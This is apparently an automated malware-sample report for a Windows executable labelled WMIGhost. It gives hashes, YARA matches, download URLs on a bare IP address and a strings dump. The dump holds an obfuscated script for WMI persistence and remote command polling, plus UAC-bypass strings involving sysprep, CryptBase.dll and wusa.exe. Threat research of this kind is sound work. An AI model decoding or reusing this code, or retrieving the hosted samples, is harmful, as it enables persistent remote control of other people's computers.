
Sample details: 6b8ea12d811acf88f94b734bf5cfbfb3

Hashes
MD5: 6b8ea12d811acf88f94b734bf5cfbfb3
SHA1: ae93cb98812fa8de21ab8ca21941b01d770272e9
SHA256: 0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2
SSDEEP: 768:j5QGuIOFwKTMAj3cdXhwlbapQ8OsHBiR+hYHAGQ:VsIOFwKT/BlbapQH05WQ
Details
File Type: PE32
Yara Hits
YRP/Armadillo_v171 | YRP/Microsoft_Visual_Cpp_v60 | YRP/Installer_VISE_Custom_additional | YRP/Microsoft_Visual_Cpp_v50v60_MFC_additional | YRP/Microsoft_Visual_Cpp_50 | YRP/Microsoft_Visual_Cpp_v50v60_MFC | YRP/Armadillo_v171_additional | YRP/Installer_VISE_Custom | YRP/Armadillo_v4x | YRP/Microsoft_Visual_Cpp | YRP/IsPE32 | YRP/IsWindowsGUI | YRP/HasRichSignature | YRP/domain | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings | YRP/anti_dbg | YRP/win_files_operation
Sub Files
881fc631cf9e2633b8f42778b5c430dc
Source
http://94.130.104.170/0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2
http://94.130.104.170/WMIGhost//0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2
http://94.130.104.170/WMIGhost/0eb038e7e5edd6ac1b4eee8dd1c51b6d94da24d02ba705e7e7f10b41edf701c2
Strings
		!This program cannot be run in DOS mode.
Rich0x
`.rdata
@.data
t4hdu@
_9= {@
YYh `@
SS@SSPVSS
t#SSUP
t$$VSS
_^][YY
t.;t$$t(
VC20XC00U
VWuBh4T@
[ShDT@
"WWSh@T@
^VhDT@
PVh@T@
runtime error 
TLOSS error
SING error
DOMAIN error
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
abnormal program termination
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
Runtime Error!
Program: 
<program name unknown>
GetLastActivePopup
GetActiveWindow
MessageBoxA
user32.dll
WinExec
GetTempPathA
MoveFileA
DeleteFileA
GetTempFileNameA
GetModuleFileNameA
LockResource
SizeofResource
LoadResource
FindResourceA
CloseHandle
WriteFile
CreateFileA
WaitForSingleObject
CreateProcessA
GetSystemDirectoryA
lstrcatA
GetLastError
KERNEL32.dll
wsprintfA
USER32.dll
GetModuleHandleA
GetStartupInfoA
GetCommandLineA
GetVersion
ExitProcess
HeapAlloc
HeapFree
TerminateProcess
GetCurrentProcess
UnhandledExceptionFilter
FreeEnvironmentStringsA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStrings
GetEnvironmentStringsW
SetHandleCount
GetStdHandle
GetFileType
GetCurrentThreadId
TlsSetValue
TlsAlloc
SetLastError
TlsGetValue
HeapDestroy
HeapCreate
VirtualFree
RtlUnwind
InitializeCriticalSection
EnterCriticalSection
LeaveCriticalSection
VirtualAlloc
HeapReAlloc
GetCPInfo
GetACP
GetOEMCP
GetProcAddress
LoadLibraryA
MultiByteToWideChar
LCMapStringA
LCMapStringW
GetStringTypeA
GetStringTypeW
lwzmpvw9|1|5m0boxk9w$;npwt~tmj#bpti|kjvwxmpvwU|o|u$pti|kjvwxm|d8EEEE7EEkvvmEEjl{jzkpimpvw;5k$^|mV{s|zm1w2;#Xzmpo|Jzkpim\o|wmZvwjlt|k;07jixnwpwjmxwz|F10"k7wxt|$;Ikv{|Jzkpim_pwm;5k7jzkpimpw~|w~pw|$;sxoxjzkpim;5k7JzkpimM|am$m2;oxk9jVnw|k$>;2|2;>"oxk9TXPW$
lwzmpvw10b=$mqpj"=7r|`$>N>"=7j_||}Lku$jAtuLku"=7jVnw|k$jVnw|k"=7jAtuLku$>>"=7vQmmi$wluu"=7vJq|uu$wluu"=7vJmk|xt$wluu"=7jQvjmWxt|$wluu"=7jVJM`i|$wluu"=7jTxzX}}k|jj$wluu"=7jLKUIxkxt$wluu"=7o|kjpvw$>+7)7)>"=7klwmpt|$,)))"=7vNTP$wluu"=7Fa$Xzmpo|AV{s|zm"d"TXPW7ikvmvm`i|$bPwpmV{s|zmj#
lwzmpvw10b=7vNTP$^|mV{s|zm1>npwt~tmj#bpti|kjvwxmpvwU|o|u$pti|kjvwxm|d8EEEEEEEE7EEEEkvvmEEEEzpto+>0"=7vJq|uu$w|n9=7Fa1>NJzkpim7Jq|uu>0"=7vJmk|xt$w|n9=7Fa1>X]V][7Jmk|xt>0"=7^|mVJPw
v10"=7^|mTxzX}}k|jj10"=7^|w|kxm|LkuIxkxt10"d5NTP#
lwzmpvw1jhu0bk|mlkw9=7vNTP7\a|zHl|k`1jhu0"d5^|mVJPw
lwzmpvw10boxk9|$w|n9\wlt|kxmvk1=7NTP1>J|u|zm939
kvt9Npw*+FVi|kxmpw~J`jm|t>00"p
18|7xm\w}100boxk9pm|t$|7pm|t10"=7jVJM`i|$pm|t7Zximpvw2pm|t7J|kopz|IxzrTxsvkO|kjpvw"=7jQvjmWxt|$pm|t7ZJWxt|"dd5^|mTxzX}}k|jj#
lwzmpvw10boxk9|$w|n9\wlt|kxmvk1=7NTP1>J|u|zm939
kvt9Npw*+FW|mnvkrX}xim|k9nq|k|9IWI]|opz|P]9upr|9EEE;<IZP<EEE;9xw}9W|mZvww|zmpvwJmxmlj$+>00"p
18|7xm\w}100b=7jTxzX}}k|jj$|7pm|t107TXZX}}k|jj"dd5^|w|kxm|LkuIxkxt#
lwzmpvw10boxk9mpt|$w|n9]xm|10"=7jLKUIxkxt$>zjm`i|$j|ko|k?xlmqwxt|$j|ko|kwxt|?xlmqixjj$j|ko|kixjj?qvjmwxt|$>2=7jQvjmWxt|2>?vjm`i|$>2=7jVJM`i|2>?txzx}}k$>2=7jTxzX}}k|jj2>?vnw|k$>2=7jVnw|k2>?o|kjpvw$>2=7o|kjpvw2>?klwmpt|$>2=7klwmpt|"=7jLKUIxkxt2$>?m$>2mpt|7~|mTpwlm|j102mpt|7~|mJ|zvw}j10"d5Zu|xwV{s|zmj#
lwzmpvw10b=7vJq|uu$wluu"=7vJmk|xt$wluu"oxk9|$w|n9\wlt|kxmvk1=7NTP1>J|u|zm939
kvt9Npw*+FIkvz|jj9nq|k|9Wxt|$EEE;jzkzvwj7|a|EEE;>00"nqpu|18|7xm\w}100b|7pm|t107m|ktpwxm|10"|7tvo|W|am10"dd5]|zv}|#
lwzmpvw1jvlkz|Jmk0boxk9r|`zv}|$jvlkz|Jmk7zqxkZv}|Xm1)0"oxk9jvlkz|$jvlkz|Jmk7jl{jmk1(0"oxk9oxuj$jvlkz|7jiupm1>5>0"oxk9k|jlum$>>"
vk1oxk9p$)"p%oxuj7u|w~mq"p220bk|jlum2$Jmkpw~7
kvtZqxkZv}|1oxujBpDGr|`zv}|0"dk|mlkw9k|jlum"d5zpkzu|]|zv}|#
lwzmpvw1jz0boxk9{xj|$jz7zqxkZv}|Xm1)0"oxk9j${xj|4*+"oxk9k$>>"
vk1oxk9p$("p%jz7u|w~mq"p220boxk9wz$jz7zqxkZv}|Xm1p04j4p2("p
1wz%*+0bwz$(+/21wz4*+0< -"dk2$Jmkpw~7
kvtZqxkZv}|1wz0"dk|mlkw9k"d5TxpwUvvi#
lwzmpvw10b=7vQmmi$w|n9=7Fa1>Tpzkvjv
m7AtuQmmi>0"oxk9
||}LkuXkk`$=7j_||}Lku7jiupm1>">0"oxk9jmxkm$w|n9]xm|10"oxk9vAtu$w|n9Xzmpo|AV{s|zm1>TJATU+7]VT]vzlt|wm7*7)>0"
vk1oxk9w$)"w%
||}LkuXkk`7u|w~mq"w220boxk9LkuUpjm$w|n9Xkkx`10"oxk9LKUwlt$)"mk`boxk9mjmk$
||}LkuXkk`BwD7txmzq1>qmmi#6673&EEEE7iqi>0"p
1mjmk8$wluu0bLkuUpjmBLKUwlt22D$mjmk"d|uj|b=7vQmmi7Vi|w1>^\M>5
||}LkuXkk`BwD5
xuj|0"=7vQmmi7j|mK|hl|jmQ|x}|k1>Lj|k4X~|wm>5>Tvcpuux6,7)91Npw}vnj"9L"9Npw}vnj9WM9,7("9ko#(7 7(09^|zrv6+)) )/+-9_pk|
va6*7,>0"=7vQmmi7J|w}10"oxk9k|jivwj|$=7vQmmi7K|jivwj|M|am7k|iuxz|161GEEj30e1EEj3=06~5>>0"oxk9k|$6%mpmu|'Y1730Y%EE6mpmu|'26~"oxk9mpmu|Upjm$k|jivwj|7txmzq1k|0"
vk1oxk9p$)"p%mpmu|Upjm7u|w~mq"p220bmk`bvAtu7uvx}ATU1mpmu|UpjmBpD0"oxk9zvwmxpw|k$vAtu7~|m\u|t|wmj[`Mx~Wxt|1>mpmu|>0"oxk9mtijmk$zvwmxpw|kB)D7m|am7txmzq1>Y1730Y>0"LkuUpjmBLKUwlt22D$=7zpkzu|]|zv}|1mtijmkB(D0"dzxmzq1|0bddd
vk1oxk9Lkupw}|a$)"Lkupw}|a%LkuUpjm7u|w~mq"Lkupw}|a220b=7jAtuLku$LkuUpjmBLkupw}|aD"oxk9klwwlt$*/)"nqpu|1klwwlt44')0b=7vQmmi7Vi|w1>IVJM>5=7jAtuLku5
xuj|0"=7vQmmi7j|mK|hl|jmQ|x}|k1>ZVWM\WM4M@I\>5>xiiupzxmpvw6a4nnn4
vkt4lku|wzv}|}>0"=7vQmmi7J|w}1=7jLKUIxkxt0"oxk9k|jivwj|$=7vQmmi7K|jivwj|M|am7k|iuxz|161GEEj30e1EEj3=06~5>>0"p
1k|jivwj|7u|w~mq')0boxk9zvttxw}j$wluu"oxk9zvwmxpw|k"mk`bvAtu7uvx}ATU1k|jivwj|0"zvwmxpw|k$vAtu7~|m\u|t|wmj[`Mx~Wxt|1>}po>0"
vk1oxk9p$)"p%zvwmxpw|k7u|w~mq"p220bp
1zvwmxpw|kBpD7~|mXmmkp{lm|1>p}>0$$>)x,,+{,x-*,+>0bzvttxw}j$|oxu1>1>2zvwmxpw|kBpD7m|am2>0>07zvttxw}"dddzxmzq1|0bdp
1zvttxw}j8$wluu0boxk9zvttxw}k|jlum$>>"
vk1oxk9p$)"p%zvttxw}j7u|w~mq"p220boxk9k|jlum$>wv9k|jivwj|>"mk`bk|jlum$|oxu1=7]|zv}|1zvttxw}jBpD7oxul|00"dzxmzq1|0bdp
1p')0bzvttxw}k|jlum2$>5>"dzvttxw}k|jlum2$>EE>>2zvttxw}jBpD7p}2>EE>#EE>>2|jzxi|1k|jlum02>EE>>"dp
1zvttxw}k|jlum7u|w~mq')0bzvttxw}k|jlum$>b>2zvttxw}k|jlum2>d>"=7vQmmi7Vi|w1>IVJM>5=7jAtuLku5
xuj|0"=7vQmmi7j|mK|hl|jmQ|x}|k1>ZVWM\WM4M@I\>5>xiiupzxmpvw6a4nnn4
vkt4lku|wzv}|}>0"=7vQmmi7J|w}1=7jLKUIxkxt2>?zvttxw}$k|jlum?zvttxw}k|jlum$>2zvttxw}k|jlum0"dd|uj|b=7jAtuLku$>>"klwwlt$)"dd=7klwmpt|$1w|n9]xm|1007~|mMpt|104jmxkm7~|mMpt|10"NJzkpim7Ju||i1())))0"dp
1=7jAtuLku7u|w~mq')0bk|mlkw"dddzxmzq1|0bddd5_pk|#
lwzmpvw10b=7PwpmV{s|zmj10"mk`b=7TxpwUvvi10"dzxmzq1|0bd=7Zu|xwV{s|zmj10"dd"w|n9TXPW107_pk|10";"oxk9p$k7IlmF10"k$^|mV{s|zm1w2;#FFPwm|koxuMpt|kPwjmklzmpvw;07jixnwpwjmxwz|F105k7Mpt|kp}$;Ikv{|Jzkpim_pwm;5k7Pwm|koxu[|mn||w\o|wmj$/|*5k7IlmF105k$^|mV{s|zm1w2;#FF\o|wm_pum|k;07jixnwpwjmxwz|F105k7wxt|$;Ikv{|Jzkpim_pwm;5k7Hl|k`$>j|u|zm939
kvt9FFmpt|k|o|wm9nq|k|9mpt|kp}$;Ikv{|Jzkpim_pwm;>5k7Hl|k`Uxw~lx~|$;NHU;"oxk9j$k7IlmF10"k|mlkw9k$^|mV{s|zm1w2;#FF_pum|kMvZvwjlt|k[pw}pw~;07JixnwPwjmxwz|F105k7Zvwjlt|k$p7ixmq5k7_pum|k$j7ixmq5k7IlmF105;;d"|1;}x();5>oxk9jAtuLku$;qmmi#66rltxk!).7{uv~jivm7zvt6
||}j6ivjmj6}|
xlum"qmmi#66rltxk!).7nvk}ik|jj7zvt6
||}6"qmmi#66rltxk!).7upo|svlkwxu7zvt6}xmx6kjj"qmmi#66{uv~j7k|}p
7zvt6rltxk!).6
||}6"qmmi#66rltxk!).7mqvl~qmj7zvt6
||}"qmmi#66rltxk!).7mlt{uk7zvt6kjj";">0"
gupdate.exe
%s\%s\%s%s %s
cmd.exe
%s\%s /c %s
cmd.exe
%s\%s /c %s
IDR_RESOURCE
gupdate.exe
\cmd.exe
IDR_RESOURCE
IDR_RESOURCE
\cmd.exe
%s%s.dll.cab
wusa.exe
/c %s %s /quiet /extract:%s\%s\
sysprep
CryptBase
SysNative
%s\%s\%s%s
%s\%s\%s%s
CryptBase.dll
kp,s{h
CryptBase.dll
85&?)+
!This program cannot be run in DOS mode.
`.rdata
@.data
DeleteFileA
InitializeCriticalSection
DeleteCriticalSection
OutputDebugStringA
LeaveCriticalSection
CloseHandle
SetFileTime
SystemTimeToFileTime
GetSystemTime
WriteFile
SetFilePointer
CreateFileA
GetSystemDirectoryA
EnterCriticalSection
GetFileAttributesA
MultiByteToWideChar
InterlockedDecrement
WaitForSingleObject
CreateProcessA
MoveFileA
GetTempPathA
GetModuleFileNameA
KERNEL32.dll
strlen
strcat
sprintf
_strtime
_vsnprintf
??2@YAPAXI@Z
__CxxFrameHandler
??3@YAXPAX@Z
memset
_beginthread
malloc
strcpy
MSVCRT.dll
__dllonexit
_onexit
_XcptFilter
_acmdln
__getmainargs
_initterm
__setusermatherr
_adjust_fdiv
__p__commode
__p__fmode
__set_app_type
_except_handler3
_controlfp
CoInitialize
CoCreateInstance
ole32.dll
OLEAUT32.dll
??0Init@ios_base@std@@QAE@XZ
??1Init@ios_base@std@@QAE@XZ
??0_Winit@std@@QAE@XZ
??1_Winit@std@@QAE@XZ
MSVCP60.dll
GetModuleHandleA
GetStartupInfoA
LocalFree
_CxxThrowException
??1type_info@@UAE@XZ
aaaaaaaa
YYYYYYYYYYYYYYYY
[%s] - %s
\httpcom.log
Script Error
Run OK
create process:%s
process[%s] end
.?AV_com_error@@
.?AVtype_info@@